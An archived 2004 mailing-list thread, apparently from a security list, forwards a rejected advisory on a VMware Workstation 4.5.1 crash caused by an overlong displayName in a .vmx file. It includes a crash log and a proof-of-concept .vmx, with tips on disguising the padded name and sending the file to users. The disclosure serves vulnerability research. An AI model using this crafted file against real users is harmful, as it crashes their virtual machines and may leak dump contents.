FW: Returned post for vuln-dev () securityfocus com

[josh gilmour <joshg () conqwest com>]

I sent it to bugtraq...
> > > > > -------------------- >>>>>
Since there are no direct security consequences here, this probably needs
some further analysis so I am going to reject it.  Vuln-Dev
(vuln-dev () securityfocus com) is a suitable forum for this post and I
encourage you to post it there.
<<<<< -------------------- <<<<<

-----Original Message-----
From: vuln-dev-owner () securityfocus com
[mailto:vuln-dev-owner () securityfocus com] 
Sent: Friday, May 28, 2004 6:35 PM
To: josh gilmour
Subject: Returned post for vuln-dev () securityfocus com

Hi! This is the ezmlm program. I'm managing the
vuln-dev () securityfocus com mailing list.

I'm working for my owner, who can be reached
at vuln-dev-owner () securityfocus com.

I'm sorry, your message (enclosed) was not accepted by the moderator.
If the moderator has made any comments, they are shown below.

> > > > > -------------------- >>>>>
Unless for some reason this isn't accepted to Bugtraq I'm going to reject
this, because it's more suited for the other list.
<<<<< -------------------- <<<<<

> --- Begin Message ---
>
>
> From: josh gilmour <joshg () conqwest com>
>
> Date: Thu, 27 May 2004 14:10:12 -0400
>
>
>
> -----Original Message-----
> From: josh gilmour 
> Sent: Thursday, May 27, 2004 10:00 AM
> To: bugtraq () securityfocus com
> Subject: VMWare Workstation Crash Advisory
>
>
>
> Bugtraq: Please post
>
>
>
> -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
>
> VMWare Workstation Crash Advisory
>
> -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
>
>
>
> ----- General Info
>
>
>
>         Risk: Low
>
>         Info: VMWare Workstation Configuration File (.vmx) displayName=""
> crash due to long buffer.
>
>         Date: 5/27/04
>
>         Found by: Josh Gilmour <joshg at conqwest dot com>
>
>
>
> ----- Overview 
>
>
>
>         VMware saves a configuration file by default within 
>
>         \Documents and Settings\<user>\My Documents\My Virtual
> Machines\<Virtual Machine Name>
>
>         Within this configuration file (designated by .vmx extension), there
> are various variables.
>
>         One variable displayName="" can be overflowed with a buffer longer
> than 255 characters.
>
>         During testing purposes I used the original name + blank spaces to
> equal 255 characters.
>
>         
>
>         Note: that this does not crash the ENTIRE program, but rather gives
> the error message:
>
>         "VMWare Workstation unrecoverable error: (vmx)
>
>          F(5093):190 Buffer too small 0x41e986
>
>          A log file is available in '\Documents and Settings\<user>\My
> Documents
>
>          \My Virtual Machines\<Virtual Machine Name>\vmware.log'. A core
> dump file 
>
>          is available in '\Documents and Settings\<user>\Application
> Data\VMware
>
>          \vmware-vmx-***.dmp'... Please request support, blah blah blah"
>
>          
>
>         Upon result of the crash, the user is left with a vmware.log file,
> and a core dump.
>
>         Both these files may have sensitive information within them.
>
>
>
>
>
> ----- Background
>
>         
>
>         "VMware Workstation is powerful virtual machine software for
> developers and system 
>
>         administrators who want to revolutionize software development,
> testing and deployment 
>
>         in their enterprise. Shipping for more than five years and winner of
> over a dozen major 
>
>         product awards, VMware Workstation enables software developers to
> develop and test the 
>
>         most complex networked server-class applications running on
> Microsoft Windows, Linux 
>
>         or NetWare all on a single desktop. Essential features such as
> virtual networking, 
>
>         live snapshots, drag and drop and shared folders, and PXE support
> make VMware 
>
>         Workstation the most powerful and indispensable tool for enterprise
> IT developers 
>
>         and system administrators." - quoted from the site www.vmware.com
>
>
>
>
>
> ----- Affected Packages
>
>
>
>         ........ product ............... OS ............. ver # .........
>
>         1 -  vmware workstation / various Windows OS / 4.5.1 - build 7568
>
>
>
>         Note: Linux systems have not been tested, yet its a possibility this
> could affect them also.
>
>         If anyone has vmware on linux, please try this out, and get back to
> me on the results.
>
>         
>
> ----- Impact
>
>
>
>         Besides being an annoyance, I do not know of any SERIOUS impacts
> that could occur,
>
>         except for maybe sensitive information being leaked in the core
> file, or .log file. 
>
>         Although, it COULD BE possible for a buffer overflow or something,
> but I'm not qualified
>
>         to determine that. It seems like a buffer overflow attack, when the
> server is crashed,
>
>         yet the normal microsoft debugger doesn't pop up, and vmware doesn't
> crash entirely, just 
>
>         the running vmware OS.
>
>         It should also be noted, that you don't need the actual image file
> for vmware, if you
>
>         have a setting wrong in the configuration file, VMware wont even
> start the virtual
>
>         machine, and give an error saying the image file isn't present.
> Since the config file is
>
>         only < 1k in size, it could be sent quickly without any time for
> downloading. When opened
>
>         the config file, checks displayName first (i believe) causing it not
> to prompt for the 
>
>         actual image file, and instead just crash, and dump core. (not
> good.)
>
>         
>
> ----- Vmware.log OUTPUT 
>
>         Just a sample output:
>
>         May 27 12:38:57: vmx| MM: Using partialmap, 98304 pages AC 0 CE 0 TM
> 0
>
>         May 27 12:38:57: vmx| STATDECLGROUP stats Root "" null
>
>         May 27 12:38:57: vmx| F(5093):190 Buffer too small 0x41e968
>
>         May 27 12:38:57: vmx| Backtrace:
>
>         May 27 12:38:57: vmx| ----Backtrace using dbghelp.dll----
>
>         May 27 12:38:57: vmx| Module path: C:\Program Files\VMware\VMware
> Workstation\bin\vmware-vmx.exe
>
>         May 27 12:38:57: vmx| Module directory: C:\Program
> Files\VMware\VMware Workstation\bin\
>
>         May 27 12:38:57: vmx| backtrace[00] ebp 0x0012f754 eip 0x0053e5ca
> params 0x0012fb74 0x00409aee 0000000000 0x00000003 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x0013d5ca] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[01] ebp 0x0012f75c eip 0x0053f9d1
> params 0000000000 0x00000003 0x00d10568 0x00d10468 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x0013e9d1] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[02] ebp 0x0012fb74 eip 0x00409aee
> params 0x005bb04c 0x005bb06c 0x000000be 0x0041e968 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x00008aee] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[03] ebp 0x0012fb90 eip 0x004f31e7
> params 0x0012fba8 0x00d10468 0x000000ff 0x00567540 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x000f21e7] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[04] ebp 0x0012fca8 eip 0x0041e968
> params 0x00133c90 0x00c9f268 0x00c9f3f8 0x0012fce0 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x0001d968] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[05] ebp 0x0012fcbc eip 0x004139de
> params 0000000000 0x0000074f 0x00000004 0x00000004 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x000129de] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[06] ebp 0x0012fce0 eip 0x004093b8
> params 0000000000 0000000000 0x00000004 0x00134270 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x000083b8] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[07] ebp 0x0012fd10 eip 0x00409104
> params 0x00000004 0x0012fd24 0x005d6488 0x001342ad [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x00008104] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[08] ebp 0x0012ff24 eip 0x00401fb7
> params 0x00400000 0000000000 0x00134270 0x0000000a [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x00000fb7] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[09] ebp 0x0012ffc0 eip 0x00401134
> params 0000000000 0x015ae5c8 0x7ffdf000 0000000000 [C:\Program
> Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
> 0x0001:0x00000134] (no symbol information)
>
>         May 27 12:38:57: vmx| backtrace[10] ebp 0x0012fff0 eip 0x7c581af6
> params 0x00401000 0000000000 0x000000c8 0x00000100
> [C:\WINNT\system32\KERNEL32.dll base 0x7c570000 0x0001:0x00010af6]
> (OpenEventA + 0x063d)
>
>         May 27 12:38:57: vmx| ----End of backtrace----
>
>         May 27 12:38:57: vmx| W32Util_CoreDump: faking exception to get
> context
>
>         May 27 12:38:57: vmx| CoreDump: Writing minidump to C:\Documents and
> Settings\<user>\Application Data\VMware\vmware-vmx-848.dmp
>
>         May 27 12:38:57: vmx| CoreDump: including module base 0x00400000
> size 0x00389000
>
>         May 27 12:38:57: vmx|   checksum 0x00000000 timestamp 0x404e4180
>
>         May 27 12:38:57: vmx|   image file C:\Program Files\VMware\VMware
> Workstation\bin\vmware-vmx.exe
>
>         May 27 12:38:57: vmx|   file version 4.5.1.7568
>
>         <bunch of CoreDump: stuff here>
>
>         May 27 12:38:57: vmx| CoreDump: Including thread 304
>
>         May 27 12:38:57: vmx| Msg_Post: Error
>
>         May 27 12:38:57: vmx| [msg.log.error.unrecoverable] VMware
> Workstation unrecoverable error: (vmx)
>
>         May 27 12:38:57: vmx| F(5093):190 Buffer too small 0x41e968
>
>         May 27 12:38:57: vmx| [msg.panic.haveLog] A log file is available in
> "C:\Documents and Settings\<user>\My Documents\My Virtual Machines\Windows
> Server 2003 Enterprise Edition\vmware.log".  [msg.panic.haveCore] A core
> file is available in "C:\Documents and Settings\<user>\Application
> Data\VMware\vmware-vmx-848.dmp".  [msg.panic.requestSupport.withLogAndCore]
> Please request support and include the contents of the log file and core
> file.  [msg.panic.response] We will respond on the basis of your support
> entitlement.
>
>         May 27 12:38:57: vmx| ----------------------------------------
>
>         May 27 12:38:59: vmx| VTHREAD thread 0 start exiting
>
>         May 27 12:38:59: vmx| VTHREAD thread 0 exiting, 0 left
>
>
>
> ----- Exploit [If it can even be called that]
>
>
>
>         Put the following in a new .vmx file, call it whatever...
>
>         open it up in vmware, and then start the virtual machine.
>
>         Note: Ive changed displayName to have it say 'Windows Server
> Enterprise 2003 [followed
>
>          by a lot of spaces] that way when you load it up in vmware, it
> doesnt
>
>          seem suspicious, it just says "Windows Server 2003 Enterprise" with
> a "..." at the
>
>          right hand portion of the screen, which MOST users wouldnt even
> notice.
>
>
>
>         -- cut win2k3-enterprise.vmx --
>
>         
>
>         config.version = "7"
>
>         virtualHW.version = "3"
>
>         scsi0.present = "TRUE"
>
>         memsize = "384"
>
>         ide0:0.present = "TRUE"
>
>         ide0:0.fileName = "Windows Server 2003 Enterprise Edition.vmdk"
>
>         ide1:0.present = "TRUE"
>
>         ide1:0.fileName = "auto detect"
>
>         ide1:0.deviceType = "cdrom-raw"
>
>         floppy0.present = "FALSE"
>
>         Ethernet0.present = "TRUE"
>
>         sound.present = "TRUE"
>
>         sound.fileName = "-1"
>
>         # note displayName having a LONG name. 256 characters to be exact.
> And it all must be on one line, so if your email client wrapped it, fix it
> to one line
>
>         displayName = "Windows Server 2003 Enterprise
> "
>
>         guestOS = "WinNT"
>
>         priority.grabbed = "normal"
>
>         priority.ungrabbed = "normal"
>
>         ide1:0.startConnected = "TRUE"
>
>         Ethernet0.addressType = "generated"
>
>         uuid.location = "56 4d 7e 36 32 6b 5c 21-f1 0c d5 03 9f 17 2f 00"
>
>         uuid.bios = "56 4d 7e 36 32 6b 5c 21-f1 0c d5 03 9f 17 2f 00"
>
>         ethernet0.generatedAddress = "00:0c:29:17:2f:00"
>
>         ethernet0.generatedAddressOffset = "0"
>
>         tools.syncTime = "TRUE" 
>
>
>
>         -- end cut --
>
>
>
>
>
> ----- Vendor Status
>
>         
>
>         Not alerted. Its not a big deal from what i can see, and they'll see
> this post anyways.
>
>         
>
> ----- Contact Information
>
>
>
>         Josh Gilmour
>
>         joshg @ <nospam> conqwest.com
>
>         
>
>         Please forgive my horrible spelling and grammar :)
>
>
> --- End Message ---